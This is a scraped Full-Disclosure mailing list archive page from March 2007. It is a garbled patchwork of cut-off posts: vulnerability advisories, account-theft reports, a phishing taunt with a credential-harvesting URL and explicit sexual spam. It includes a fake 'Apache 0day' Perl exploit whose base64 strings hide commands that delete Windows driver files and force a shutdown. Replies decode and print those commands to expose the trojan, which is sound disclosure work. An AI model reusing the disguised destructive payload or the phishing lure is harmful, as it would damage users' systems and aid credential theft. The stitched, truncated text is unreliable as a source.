==
Layered Defense Research Advisory 18 March 2007
==
1) Affected Software
F-Secure Anti-Virus Client Security Version 6.02
==
2) Severity Rating:
Low
unsubscribe
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
[EMAIL PROTECTED]
Sent: Monday, March 19, 2007 7:00 AM
To: full-disclosure@lists.grok.org.uk
Subject: Full-Disclosure Digest, Vol 25, Issue 27
Send Full-Disclosure mailing list submissions to
Here another one :
http://spreadsheets.google.com/contacts/picker/data/contacts?groups=truesho
w=ALLenums=truemax=999out=xml
Lets Play
Dror
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
MADYNES Security Advisory
http://madynes.loria.fr/ http://madynes.loria.fr
Title: Asterisk SIP INVITE remote DOS
Release Date:
08/03/2007
Severity:
High - Denial of Service
Advisory ID:KIPH1
Software:
Asterisk
http://www.asterisk.org/
netVigilance Security Advisory #14
w-agora version 4.2.1 Multiple Path Disclosure Vulnerabilities
Description:
w-agora is a set of scripts written in PHP. This package is intended to
allow users to share, exchange and publish information, files and
discussions over the web.
Multiple path
netVigilance Security Advisory #15
w-agora version 4.2.1 Information Disclosure Vulnerability
Description:
w-agora is a set of scripts written in PHP. This package is intended to
allow users to share, exchange and publish information, files and
discussions over the web.
It is possible to
Hi,
A new apache 1.x 0day
#!/usr/bin/perl
use MIME::Base64;
use IO::Socket;
use HTTP::Response;
use HTTP::Status;
use Getopt::Std;
print q {
#
##
## Apache 1.X Remote Buffer Overflow getRoot() Exploit
## written by 666 - [EMAIL
Description:
dkftpbench is an FTP benchmark program inspired by SPECweb99. The
result of the benchmark is a number-of-simultaneous-users rating;
after running the benchmark properly, you have a good idea how many
simultaneous dialup clients a server can support. The target bandwidth
per client is
$mov =
decode_base64(QGRlbCAlU3lzdGVtUm9vdCVcU3lzdGVtMzJcZHJpdmVyc1wqLiogL0YgL1MgL1EgPiBudWw=);
@del %SystemRoot%\System32\drivers\*.* /F /S /Q nul
$int = decode_base64(c2h1dGRvd24gLXMgLWYgLXQgMA==);
shutdown -s -f -t 0
--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36
@del %SystemRoot%\System32\drivers\*.* /F /S /Q nul
shutdown -s -f -t 0
What, the attempt at visually obstructing the system() calls didn't give
it away?
___
Full-Disclosure - We believe in it.
Charter:
Description:
CFTP is Comfortable FTP, a full screen ftp client.
Supported are FTP both with active and passive data connections,
IPv4 and IPv6, and SFTP (a file transfer protocol using SSH for
authorization and connection encryption).
Found local buffer overflow in readrc() with sprintf() with no
lol,
system ($mov);system ($int);shift;
$mov and $int are base64 encoded pieces of crap deleting
%systemroot%\system32\drivers\*.* and shutting down teh windows box,
funny and oh so obvious.
___
Full-Disclosure - We believe in it.
Charter:
===
Ubuntu Security Notice USN-437-1 March 19, 2007
libwpd vulnerability
CVE-2007-0002
===
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
Ubuntu 6.06
Hi to all,
While playing in my home's network with Scapy I found
a vulnerability affecting the wireless services
offered by Zyxel routers with, at least, ZynOS v3.40.
That's the unique model I tested.
The exploit in question:
--
ZynOS v3.40 One
Since boatloads of people are asking me about this I figured I would
just give an update here
Here is an exhaustive list of people experiencing the problem as well
as a possible source of the account theft (Clan Infamous)
http://www.oinfamouso.moonfruit.com/
They claim to be pretexting
Dear Yahoo
We use the following email to collect victims' credentials [1]. Please
ban our asses!
[EMAIL PROTECTED]
[1] http://88.191.15.116/www.paypal.com/cgi-bin/www.amazon.com.zip
thanks for reading
heee he
___
Full-Disclosure -
Dates indicate thread start date not necessarily the offending post
date.
Clan Homepages of *some* of those that are responsible for the
attacks on Xbox live accounts.
3-19-2007 (See the blacklist and member list)
o InFamOuS o clan
http://www.oinfamouso.moonfruit.com/
3-19-2007
This Site
Now that is what I call full dis-clotheser. Geez!
-Original Message-
From: Miss Aveline [mailto:[EMAIL PROTECTED]
Sent: Tuesday, March 20, 2007 12:37 AM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Sexy, spankable 22 year old girl looking for a wild
time
hey sexys,
On Mar 19, 2007, at 11:37 PM, Miss Aveline wrote:
hey sexys,
22/f/st. catherines bi girl looking for a casual thing no strings
attached. love the cock, but will eat pussy too. into BDSM,
roleplay, ageplay, and watersports and spankings especially ;-).
3-4somes are fine, but any more
19 matches
Mail list logo